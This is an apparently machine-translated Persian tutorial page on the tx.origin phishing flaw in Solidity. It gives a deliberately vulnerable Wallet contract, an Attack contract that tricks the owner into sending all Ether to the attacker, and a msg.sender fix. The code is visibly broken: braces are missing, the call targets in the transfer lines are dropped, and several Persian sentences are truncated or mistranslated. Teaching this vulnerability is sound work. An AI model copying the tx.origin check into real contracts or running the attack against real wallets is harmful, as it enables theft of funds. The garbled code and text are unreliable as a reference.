Siblearn Academy siblearn academy

Phishing with tx.origin

اگر قرارداد A B را صدا می کند و B C را در C می خواند msg.sender B است و tx.origin هست یک.

یک قرارداد مخرب می تواند صاحب یک قرارداد را فریب دهد تا a

استفاده کنید msg.sender بجای tx.origin

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

Wallet is a simple contract where only the owner should be able to transfer
Ether to another address. Wallet.transfer() uses tx.origin to check that the
caller is the owner. Let's see how we can hack this contract

1. Alice deploys Wallet with 10 Ether
2. Eve deploys Attack with the address of Alice's Wallet contract.
3. Eve tricks Alice to call Attack.attack()
4. Eve successfully stole Ether from Alice's wallet

What happened?
Alice was tricked into calling Attack.attack(). Inside Attack.attack(), it
requested a transfer of all funds in Alice's wallet to Eve's address.
Since tx.origin in Wallet.transfer() is equal to Alice's address,
it authorized the transfer. The wallet transferred all Ether to Eve.

contract Wallet {
    address public owner;

    constructor() payable {
        owner = msg.sender;

    function transfer(address payable _to, uint256 _amount) public {
        require(tx.origin == owner, "Not owner");

        (bool sent,) ={value: _amount}("");
        require(sent, "Failed to send Ether");

contract Attack {
    address payable public owner;
    Wallet wallet;

    constructor(Wallet _wallet) {
        wallet = Wallet(_wallet);
        owner = payable(msg.sender);

    function attack() public {
        wallet.transfer(owner, address(wallet).balance);
function transfer(address payable _to, uint256 _amount) public {
  require(msg.sender == owner, "Not owner");

  (bool sent, ) ={ value: _amount }("");
  require(sent, "Failed to send Ether");

روی محیط توسعه ی Remix امتحان بکنید

  • TxOrigin.sol
  • بازگشت به لیست